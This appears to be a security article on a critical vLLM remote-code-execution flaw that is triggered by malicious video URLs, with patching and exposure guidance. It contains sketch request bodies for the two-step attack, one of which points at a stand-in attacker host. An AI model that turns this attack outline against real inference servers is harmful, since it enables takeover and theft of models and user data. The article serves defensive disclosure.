Critical vLLM Vulnerability Lets Attackers Take Over AI Servers With a Video Link

A CVSS 9.8 flaw in the popular AI inference engine allows unauthenticated remote code execution through malicious video URLs. Patch now if you're running multimodal models.

If you’re running vLLM to serve multimodal AI models, stop what you’re doing and patch. A critical vulnerability disclosed on February 2 allows unauthenticated attackers to take over your server by sending a single malicious video URL.

The flaw (CVE-2026-22778, CVSS 9.8) affects versions 0.8.3 through 0.14.0 of vLLM, the high-throughput inference engine downloaded more than 3 million times a month. Anyone serving video-capable multimodal models is at risk.

How the Attack Works

This is a chained exploit combining two weaknesses:

Step 1: Information leak. When you submit an invalid image to a vLLM multimodal endpoint, the Python Imaging Library throws an error. In vulnerable versions, vLLM returns that error text directly to the client, heap memory addresses included. That leaks enough information to defeat Address Space Layout Randomization (ASLR), cutting a brute-force search of roughly 4 billion guesses down to about 8.
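The leaky pattern is easy to sketch in plain Python (illustrative only, not vLLM's actual code): the default repr of a Python object embeds its heap address, so echoing raw exception text back to an API client can hand that address to an attacker.

```python
class FrameBuffer:
    """Stand-in for an internal decoder object."""


def handle_upload(data: bytes) -> dict:
    buf = FrameBuffer()
    try:
        # The default repr of `buf` looks like
        # "<__main__.FrameBuffer object at 0x7f9c...>", i.e. a heap address.
        raise ValueError(f"cannot decode frame into {buf!r}")
    except ValueError as exc:
        return {
            # Vulnerable pattern: echo the exception straight to the client.
            "leaky": {"error": str(exc)},
            # Safer pattern: log details server-side, return a generic message.
            "safe": {"error": "invalid media input"},
        }


resp = handle_upload(b"\x00")
print(resp["leaky"]["error"])  # contains a hex address like '0x7f9c...'
print(resp["safe"]["error"])   # 'invalid media input'
```

The fix in vLLM 0.14.1 follows the same principle: decoder errors are logged, not echoed.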

Step 2: Heap overflow. The real damage comes from OpenCV’s bundled FFmpeg JPEG2000 decoder. When vLLM fetches video from an attacker-controlled URL, a malicious “cdef” (channel definition) box can remap color channels past the end of the allocated buffer. A 150×64-pixel frame produces a 7,200-byte overflow, enough to overwrite function pointers and execute arbitrary code.

The attacker just needs to send two API requests: one to leak the memory address, another to trigger the overflow. No authentication required in vLLM’s default configuration.
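The shape of those two requests can be illustrated with placeholder payloads (the field names below follow the OpenAI-compatible chat API that vLLM exposes, but the exact content types for video input are an assumption; the payloads here are harmless stand-ins, not an exploit):

```python
# Request 1: a malformed image to provoke a verbose decoder error (the leak).
leak_request = {
    "model": "some-multimodal-model",  # placeholder model name
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "describe this"},
            # Truncated/garbage base64 -> PIL raises, error text comes back.
            {"type": "image_url", "image_url": {"url": "data:image/png;base64,AAAA"}},
        ],
    }],
}

# Request 2: a video URL under the attacker's control (the overflow trigger).
overflow_request = {
    "model": "some-multimodal-model",
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "describe this"},
            {"type": "video_url", "video_url": {"url": "https://attacker.example/frame.mp4"}},
        ],
    }],
}
```

The point is that both are ordinary-looking API calls; nothing in the request itself distinguishes them from legitimate multimodal traffic.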

What’s at Stake

Successful exploitation gives attackers:

  • Your AI models: Proprietary models, fine-tuned weights, custom training data
  • User prompts: Every conversation passing through your inference server
  • Infrastructure access: Lateral movement through your network, especially dangerous in GPU clusters
  • Compute resources: Cryptomining, botnet participation, or attacking others from your infrastructure

This is particularly concerning for organizations running vLLM at scale. The library is popular precisely because it handles high throughput efficiently - which means compromised servers may be processing thousands of user requests.

Who’s Affected

You’re vulnerable if you’re running vLLM versions 0.8.3 through 0.14.0 with multimodal video model support enabled. Common affected setups include:

  • Self-hosted multimodal inference APIs
  • Internal AI services using vision-language models
  • Development environments with video model endpoints exposed
  • Cloud GPU instances serving multimodal models

If you’re only running text-based models, you’re not affected. The vulnerability specifically requires video processing functionality.

What You Should Do

Immediate action: Upgrade to vLLM 0.14.1 or later. The patched version fixes both the information leak and the underlying heap overflow.

pip install --upgrade "vllm>=0.14.1"
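If you want to verify the installed version programmatically, a minimal check against the patched floor looks like this (a hand-rolled sketch that assumes plain numeric versions; real deployments should use `packaging.version` instead):

```python
def is_patched(version: str, floor=(0, 14, 1)) -> bool:
    """Return True if a dot-separated numeric version is >= the patched floor."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    # Pad short versions like "0.14" so the tuple comparison is well-defined.
    parts += (0,) * (3 - len(parts))
    return parts >= floor


print(is_patched("0.14.0"))  # False: vulnerable
print(is_patched("0.14.1"))  # True: patched
```

In a live environment you would feed it `importlib.metadata.version("vllm")`.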

If you can’t patch immediately:

  • Disable video model endpoints
  • Restrict network access so vLLM APIs aren’t exposed to untrusted networks
  • Deploy behind authentication (which you should have been doing anyway)

Audit your exposure: Check if your vLLM endpoints have been accessible from the internet. While no active exploitation has been confirmed yet, a public proof-of-concept exists in the GitHub Security Advisory.
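A quick way to spot-check reachability is a TCP probe run from an external vantage point (the hostname below is a placeholder for your deployment; vLLM's API server typically listens on port 8000):

```python
import socket


def port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


# Run this from *outside* your network: if it prints True, the API is
# reachable from wherever this script runs.
print(port_open("your-vllm-host.example", 8000, timeout=1.0))
```

A reachable port isn't proof of compromise, but combined with missing authentication it defines your exposure window.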

The Bigger Picture

This vulnerability highlights a growing problem: AI inference infrastructure inherits security issues from its dependencies. The actual bug isn’t in vLLM’s code - it’s in OpenCV’s FFmpeg JPEG2000 decoder. But because vLLM uses OpenCV to process video, the vulnerability cascades up into a critical RCE in AI infrastructure.

As organizations rush to deploy multimodal AI, they’re inheriting complex dependency chains. Video processing, image decoding, audio handling - each adds attack surface. And because AI inference servers often have access to sensitive models and user data, they’re high-value targets.

The security community is paying attention: OX Security notified vulnerable customers and urged them to update immediately, and Orca Security published a detailed technical analysis within days of disclosure.

If you’re running any AI inference infrastructure, this is a reminder to treat it like the production system it is: patch promptly, restrict network access, and don’t assume default configurations are secure.